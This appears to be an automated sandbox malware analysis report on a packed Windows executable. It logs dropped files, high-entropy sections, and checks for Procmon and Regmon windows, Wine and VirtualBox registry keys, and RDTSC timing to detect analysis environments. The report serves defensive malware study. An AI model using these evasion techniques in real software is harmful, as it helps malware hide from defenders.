Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Section loaded: linkinfo.dll			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Section loaded: ntshrui.dll			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Section loaded: cscapi.dll			Jump to behavior

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Cleaner.lnk.0.dr

LNK file: ..\AppData\Local\Temp\RW3K9d2N3G7523VWAEKe2F3YfY1G\Y-Cleaner.exe

Source: BEd2lJRXFM.exe

Static file information: File size 1980416 > 1048576

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: BEd2lJRXFM.exe

Static PE information: Raw size of teawbsxt is bigger than: 0x100000 < 0x1b3e00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe

Unpacked PE file: 0.2.BEd2lJRXFM.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;teawbsxt:EW;afnwtvib:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Source: Y-Cleaner.exe.0.dr

Static PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: dll[1].0.dr	Static PE information: real checksum: 0x0 should be: 0x400e1
Source: Bunifu_UI_v1.5.3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x400e1
Source: soft[1].0.dr	Static PE information: real checksum: 0x0 should be: 0x170243
Source: Y-Cleaner.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x170243
Source: BEd2lJRXFM.exe	Static PE information: real checksum: 0x1e84fd should be: 0x1ea51e

Source: BEd2lJRXFM.exe	Static PE information: section name:
Source: BEd2lJRXFM.exe	Static PE information: section name: .idata
Source: BEd2lJRXFM.exe	Static PE information: section name:
Source: BEd2lJRXFM.exe	Static PE information: section name: teawbsxt
Source: BEd2lJRXFM.exe	Static PE information: section name: afnwtvib
Source: BEd2lJRXFM.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_3_04D1E2B5 push esi; ret		0_3_04D1E2BE
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_0041FAB5 push esi; ret		0_2_0041FABE
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_1000E891 push ecx; ret		0_2_1000E8A4
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00A078A3 push ecx; mov dword ptr [esp], esi		0_2_00A078A7
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00A2E087 push 646FD5B2h; mov dword ptr [esp], eax		0_2_00A2E0A9
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_009B84B7 push esi; mov dword ptr [esp], ecx		0_2_009B84F0
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00A2DC9D push 19B3C22Eh; mov dword ptr [esp], edx		0_2_00A2DCE1
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00A2F0C4 push 5250CDEDh; mov dword ptr [esp], esp		0_2_00A2F0E2
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00A1FCC6 push 0AD3F2F1h; mov dword ptr [esp], edi		0_2_00A1FD01
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00A1FCC6 push 5526092Fh; mov dword ptr [esp], edi		0_2_00A1FD1E
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00A35817 push 20645807h; mov dword ptr [esp], esi		0_2_00A35839
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00A35817 push 7E2D7B13h; mov dword ptr [esp], edx		0_2_00A35867
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00A8887A push esi; mov dword ptr [esp], 5AFF0D55h		0_2_00A888A0
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00A8887A push ecx; mov dword ptr [esp], 7BF31140h		0_2_00A888D5
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00A8887A push 04E94E0Eh; mov dword ptr [esp], esi		0_2_00A88952
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00AAA075 push edx; mov dword ptr [esp], esp		0_2_00AAA0DE
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00A1C444 push 728F4E02h; mov dword ptr [esp], ebx		0_2_00A1C4A4
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00A1C444 push ebx; mov dword ptr [esp], esp		0_2_00A1C4F0
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00A3CC44 push ecx; mov dword ptr [esp], esi		0_2_00A3CC4E
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00A359A6 push ecx; mov dword ptr [esp], edx		0_2_00A359E9
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00A711A2 push 28FB7999h; mov dword ptr [esp], edi		0_2_00A711B0
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_009D498D push 219DFA53h; mov dword ptr [esp], edi		0_2_009D49C5
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_009D498D push ecx; mov dword ptr [esp], esi		0_2_009D4A28
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00A0E589 push edi; mov dword ptr [esp], ebp		0_2_00A0E5DB
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00A2DD8E push 341DA5E2h; mov dword ptr [esp], edi		0_2_00A2DD9C
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00A2DD8E push eax; mov dword ptr [esp], ebp		0_2_00A2DDBB
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00A2DD8E push 1B154498h; mov dword ptr [esp], ebx		0_2_00A2DE3F
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00A081E8 push ebp; mov dword ptr [esp], ecx		0_2_00A08226
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00A631F4 push eax; mov dword ptr [esp], ebp		0_2_00A63264
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_009C49FE push 7A9228AEh; mov dword ptr [esp], edi		0_2_009C4A27
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00A15DCD push 2A4A7E1Bh; mov dword ptr [esp], eax		0_2_00A15DF0

Source: BEd2lJRXFM.exe	Static PE information: section name: teawbsxt entropy: 7.9486883918253
Source: Y-Cleaner.exe.0.dr	Static PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].0.dr	Static PE information: section name: .text entropy: 7.918511524700298

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]			Jump to dropped file
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	File created: C:\Users\user\AppData\Local\Temp\RW3K9d2N3G7523VWAEKe2F3YfY1G\Bunifu_UI_v1.5.3.dll			Jump to dropped file
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	File created: C:\Users\user\AppData\Local\Temp\RW3K9d2N3G7523VWAEKe2F3YfY1G\Y-Cleaner.exe			Jump to dropped file
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]			Jump to dropped file

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]			Jump to dropped file
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]			Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Window searched: window name: FilemonClass			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Window searched: window name: PROCMON_WINDOW_CLASS			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Window searched: window name: RegmonClass			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Window searched: window name: FilemonClass			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Window searched: window name: PROCMON_WINDOW_CLASS			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Window searched: window name: Regmonclass			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Window searched: window name: Filemonclass			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Window searched: window name: PROCMON_WINDOW_CLASS			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Window searched: window name: Regmonclass			Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 81D1A0 second address: 81D1D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C8198D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007F270C8198D4h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 81D1D0 second address: 81D1D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 81D1D6 second address: 81D1DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9A10C7 second address: 9A10DD instructions: 0x00000000 rdtsc 0x00000002 js 00007F270C81A206h 0x00000008 jng 00007F270C81A206h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9A10DD second address: 9A10EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C8198CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9A10EC second address: 9A10FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F270C81A20Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9A10FE second address: 9A110C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F270C8198C6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9A129F second address: 9A12A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9A12A5 second address: 9A12AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9A12AB second address: 9A12B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9A12B4 second address: 9A12B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9A12B8 second address: 9A12BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9A1552 second address: 9A1581 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F270C8198C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F270C8198E5h 0x00000010 jmp 00007F270C8198D9h 0x00000015 jbe 00007F270C8198C6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9A1581 second address: 9A15C2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F270C81A216h 0x00000008 jmp 00007F270C81A20Eh 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F270C81A215h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9A15C2 second address: 9A15D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jno 00007F270C8198C6h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9A15D0 second address: 9A15D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9A175B second address: 9A175F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9A175F second address: 9A1765 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9A18EA second address: 9A190E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F270C8198D3h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F270C8198CDh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9A190E second address: 9A1912 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9A1A8B second address: 9A1A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9A1A91 second address: 9A1A9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F270C81A206h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9A44F5 second address: 9A4524 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jnc 00007F270C8198C8h 0x00000010 jmp 00007F270C8198CFh 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a pushad 0x0000001b push esi 0x0000001c push edi 0x0000001d pop edi 0x0000001e pop esi 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9A4524 second address: 9A4528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9A4528 second address: 9A452C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9A452C second address: 9A4559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 movsx edx, dx 0x0000000b lea ebx, dword ptr [ebp+1245B239h] 0x00000011 movsx edi, cx 0x00000014 xchg eax, ebx 0x00000015 jmp 00007F270C81A211h 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9A4559 second address: 9A455D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9A455D second address: 9A4567 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F270C81A206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9C5379 second address: 9C5380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9C5380 second address: 9C53A9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F270C81A21Fh 0x00000008 jng 00007F270C81A20Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9C3435 second address: 9C343B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9C36ED second address: 9C36F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F270C81A206h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9C3863 second address: 9C3869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9C3999 second address: 9C39A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F270C81A206h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9C39A9 second address: 9C39B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9C3C4D second address: 9C3C51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9C3F1D second address: 9C3F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F270C8198CBh 0x0000000c jmp 00007F270C8198CCh 0x00000011 push edi 0x00000012 pop edi 0x00000013 popad 0x00000014 pop esi 0x00000015 push eax 0x00000016 jmp 00007F270C8198CFh 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9C3F52 second address: 9C3F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9C409E second address: 9C40A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F270C8198C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9C40A8 second address: 9C40BE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F270C81A206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F270C81A20Ch 0x0000000f rdtsc
